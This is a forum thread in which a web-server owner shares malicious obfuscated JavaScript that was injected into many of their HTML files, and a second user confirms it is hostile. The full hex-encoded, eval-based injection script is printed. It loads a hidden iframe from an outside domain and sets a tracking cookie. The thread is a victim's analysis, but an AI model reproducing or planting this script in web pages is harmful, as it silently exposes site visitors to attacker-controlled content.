Some Interesting Obfuscated Snippets - Security & Cryptography
Users browsing this thread: 3 Guest(s)
|
|||
One of my shared web servers was compromised and this type of shit has been added to tons of files on the server. I'll occasionally update this with new finds. No, the host does not care. They do not believe me. No, I will not be renewing my plan.
Appended to various HTML files: Code: <script type="text/javascript" language="javascript" > try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e877b7b78782e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e877b7b78783c8180712e4b2e357682827e483d3d7a777d827d7c3c717d7b3c76793d777b6f7573813d515c7e5e428279453c7e767e35491b182e877b7b78783c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e877b7b78783c8182877a733c707d807273802e4b2e353e35491b182e877b7b78783c8182877a733c7673777576822e4b2e353f7e8635491b182e877b7b78783c8182877a733c85777282762e4b2e353f7e8635491b182e877b7b78783c8182877a733c7a7374822e4b2e353f7e8635491b182e877b7b78783c8182877a733c827d7e2e4b2e353f7e8635491b181b182e77742e362f727d71837b737c823c757382537a737b737c82508757723635877b7b78783537372e891b182e727d71837b737c823c858077827336354a7277842e77724b6a35877b7b78786a354c4a3d7277844c3537491b182e727d71837b737c823c757382537a737b737c82508757723635877b7b787835373c6f7e7e737c725176777a7236877b7b787837491b182e8b1b188b1b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e891b182e846f802e827d726f872e4b2e7c73852e526f82733637491b182e846f802e73867e7780732e4b2e7c73852e526f82733637491b182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f491b182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f878137491b182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a8373371b182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e303037491b188b1b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e891b182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e37491b182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f491b182e77742e362e362e2f81826f80822e372e34341b182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e371b182e891b182e80738283807c2e7c837a7a491b182e8b1b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a491b182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e37491b182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c758276491b182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));</script> So that code executes this: Code: function zzzfff() { It apparently sets a cookie with the name "visited_uq" to the value 55. Does anybody have any ideas? The .com.hk URL links to a PHP script that echos "ok". I don't see the value referenced any where else in this particular block, but it creates an iFrame holding the value so it would be globally accessible on the page. |
|||
|
|||
Yeah, it's definitely malicious. When I remove them new ones are added, usually basically the same. They always lead to really bizarre websites which I assume are decoys or something...
|
|||